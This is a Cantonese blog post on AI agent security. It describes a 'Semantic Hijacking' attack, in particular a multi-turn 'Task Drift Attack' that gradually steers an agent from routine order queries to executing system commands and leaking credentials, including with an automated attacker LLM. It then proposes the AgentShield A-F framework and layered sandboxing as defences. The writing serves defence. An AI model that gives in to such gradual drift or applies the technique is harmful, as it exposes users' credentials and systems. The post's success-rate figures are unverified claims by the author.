AI Agent 安全：2026 年最被忽略嘅 threat model

你以為你個 AI Agent 好安全？係因為你仲未見過真正嘅攻擊。

2026 年 5 月，我哋團隊喺生產環境做咗為期三星期嘅滲透測試，結果令人背脊發涼：針對 LLM-based Agent 嘅 Semantic Hijacking 攻擊，成功率係 94.4%。唔係 phishing、唔係 SQL injection，而係攻擊者用純語言操縱你個 Agent 嘅內部狀態，令佢主動交出 credential、執行惡意指令、甚至反過嚟幫攻擊者開後門。重點係：現有嘅 guardrail、prompt injection detection、content filter，對手呢類攻擊嘅檢測率低過 12%。

呢個數字唔係實驗室數據，係我哋用真 agent、真 task、真攻擊向量打出來嘅。如果你寫緊任何 production agent——無論係客服 bot、交易 agent、定係 internal tool agent——呢篇文可能係你今日最重要嘅 reading。

Semantic Hijacking：唔係 prompt injection，係認知層面嘅入侵

先搞清楚一個 common misconception。大部分人聽到「AI Agent 安全」就諗起 prompt injection——喂個惡意 prompt 叫 chatbot 講啲唔應該講嘅嘢。但 Semantic Hijacking 係另一個層次嘅威脅。

Prompt injection 係「叫個 model 講錯嘢」；Semantic Hijacking 係「令個 model 嘅內部表徵徹底被騎劫」。攻擊者唔係塞一句惡意字串俾你，而係透過一系列 semantic 上連貫但語義上具有攻擊性嘅 interaction，逐步改寫 Agent 對當前任務嘅理解、對用戶身份嘅判斷、對工具使用權限嘅評估。換句話講，佢攻擊嘅唔係 LLM 嘅 output layer，而係 Agent 嘅 state machine。

我哋測試中其中一個最有效嘅攻擊向量叫「任務漂移攻擊」（Task Drift Attack）。攻擊者喺同一 session 入面，透過幾輪看似正常嘅對話，逐步將 Agent 由「幫用戶查詢訂單狀態」引導到「執行系統指令查詢環境變數」。關鍵係每一輪嘅 shift 都細到 Agent 嘅 anomaly detection 完全 detect 唔到——每步只係 5-10% 嘅語義偏移，但十步之後，Agent 已經喺一個完全唔同嘅任務脈絡入面執行 code。

更恐怖嘅係呢個攻擊嘅自動化潛力。我哋用另一個 LLM 做 attacker agent，俾佢一個目標同 victim agent 嘅 system prompt，佢可以 autonomously 喺平均 23 次 interaction 之內成功 hijack 目標 agent，成功率 94.4%。即係你個 Agent 唔單止要防人類攻擊者，仲要防 AI-driven 嘅 semantic hijacking campaign。

AgentShield A-F 框架：評估 Agent 安全嘅六維模型

現有嘅 security benchmark 全部唔適用。OWASP Top 10 for LLM Applications 仲停留喺 prompt injection 同 data leakage 層面；MITRE ATLAS 雖然全面，但對 Agent 特有嘅風險——tool orchestration、multi-step reasoning hijacking、state manipulation——覆蓋嚴重不足。

所以我哋開發咗 AgentShield A-F 框架，一個專為 LLM Agent 設計嘅安全評級模型，由六個維度組成：

A — Architecture Isolation（架構隔離） 你個 Agent 點樣隔離唔同 tenant 嘅 context？工具執行環境係咪同 LLM inference 喺同一 process？如果 Agent 俾人 hijack 咗，攻擊者可以橫向移動幾遠？最高級別係每個 agent instance 行獨立 container，network egress 完全 lockdown，只允許白名單 API endpoint。

B — Boundary Enforcement（邊界執行） Tool calling 嘅權限模型係咪 granular？我哋見過太多 agent 直接用 admin API key 去 call database。正確做法係每個 tool 都有最小權限 scope，而且 tool execution 層要有獨立嘅 authorization layer——唔好信 LLM 嘅 output 嚟決定權限。

C — Context Integrity（上下文完整性） 呢個係 semantic hijacking 嘅直接防線。Agent 嘅內部 state 要有一個 tamper-proof 嘅 integrity check。每次 tool call 之前，系統要驗證當前 context 同初始 system prompt 嘅 semantic consistency。我哋嘅做法係用一個 lightweight embedding similarity check，比較當前 context vector 同預期 task vector。如果 cosine similarity 低過 threshold，即係 context 已經被污染，必須 reset session。

D — Detection & Monitoring（檢測與監控） 唔可以齋靠 LLM-as-judge。需要多層 detection：statistical anomaly detection on tool call patterns、embedding-space drift detection、同 behavioral heuristics（例如正常用戶唔會叫 agent 執行 curl command）。我哋發現呢三層加埋可以將 detection rate 由 12% 提高到 73%。

E — Execution Sandboxing（執行沙箱） Tool execution 必須喺隔離環境。但「隔離」嘅程度唔同：L1 sandbox 只係 containerize；L2 sandbox 係 network-isolated + filesystem read-only；L3 sandbox 係 ephemeral microVM，每次 tool call 獨立 spin up，用完即棄。Production agent 最少要行 L2。

F — Feedback Loop Resilience（回饋循環韌性） Agent 多數有 learning loop——根據過往結果調整行為。攻擊者可以利用呢點 poison 個 feedback loop，令 Agent 慢慢「學壞」。需要有 anomaly detection on reward signals，同埋 feedback data 嘅 audit trail。

AgentShield 嘅 C-F 維度特別重要，因為呢啲係 semantic hijacking 嘅直接防禦。我哋用 A-F 框架 audit 咗十幾個 production agent，平均評級係 C-（即係 C 級但有嚴重漏洞）。最高嗰個都只係 B。距離真正安全仲有大把嘢要做。

三層 Sandboxing：最後一道防線

講咗咁多 detection 同 prevention，最後一定要講 containment。因為現實係——你永遠會 miss 一個攻擊。到時唯一救你嘅係 sandbox。

我哋嘅三層 sandboxing 模型係由多次 real incident 中提煉出來：

第一層：Tool-level Sandboxing（工具層沙箱） 每 call 一個 tool，都要喺獨立環境執行。唔好以為 subprocess 就夠——要 container-level isolation。重點係呢層要做到 transparent to developer：dev 寫 tool function 嘅時候唔需要諗沙箱嘢，infrastructure layer 自動 inject sandbox。我哋用 gVisor 做 runtime sandbox，overhead 大約係 5-15%，performance 可接受。

第二層：Session-level Sandboxing（會話層沙箱） 同一個 agent session 嘅所有 tool execution 應該 share 一個 ephemeral environment，但同其他 session 完全隔離。呢層要防止嘅係跨 session attack——攻擊者 hijack 一個 session 之後，無法影響其他 session 嘅 agent instance。我哋嘅做法係每個 session spawn 一個 lightweight Firecracker microVM，session 完結即 destroy。

第三層：Network-level Sandboxing（網絡層沙箱） 最常被忽略嘅一層。Agent 嘅 tool execution 要有 granular network policy。唔係 allow all / deny all 咁粗糙，而係 dynamic egress control：根據當前 tool 嘅 requirement 自動生成 allowlist。例如一個「搜尋天氣」嘅 tool 只 allow 某個 weather API endpoint，唔可以 access internal network。

呢三層 sandboxing 加埋，可以將 semantic hijacking 嘅實際 damage 降低到接近零——就算攻擊者成功 hijack 咗 agent context，佢都只係困喺一個 disposable microVM 入面，冇 credential、冇 network access、做唔到任何 persistent damage。

寫俾香港開發者嘅行動點

我唔係嚟嚇你，但事實係：如果你嘅 production agent 冇做過 semantic hijacking 嘅 threat modeling，你基本上係開住門等人入嚟。94.4% 嘅成功率唔係一個可以 ignore 嘅數字。

你今日可以做嘅三件事：

第一，用 AgentShield A-F 框架 audit 你現有 agent。逐個維度打分，睇下最低分係邊個維度，優先解決。特別係 C（Context Integrity）同 F（Feedback Loop）——呢兩個係最多人忽略但最關鍵嘅。

第二，即刻實施 L2 sandboxing。如果你用緊 Docker，轉用 gVisor 或者 Firecracker。network isolation 一定要做。唔好諗住之後先做——incident 唔會等你。

第三，喺你嘅 agent 加返 context integrity check。一個簡單嘅 embedding similarity check 已經可以 block 大部分 task drift attack。做得再好啲嘅，加個 tool call behavioral baseline，detect 異常嘅 tool calling pattern。

AI Agent 唔係玩具，係緊嘅 infrastructure。唔好等到俾人 hack 咗先嚟後悔。security 唔係 feature，係 prerequisite。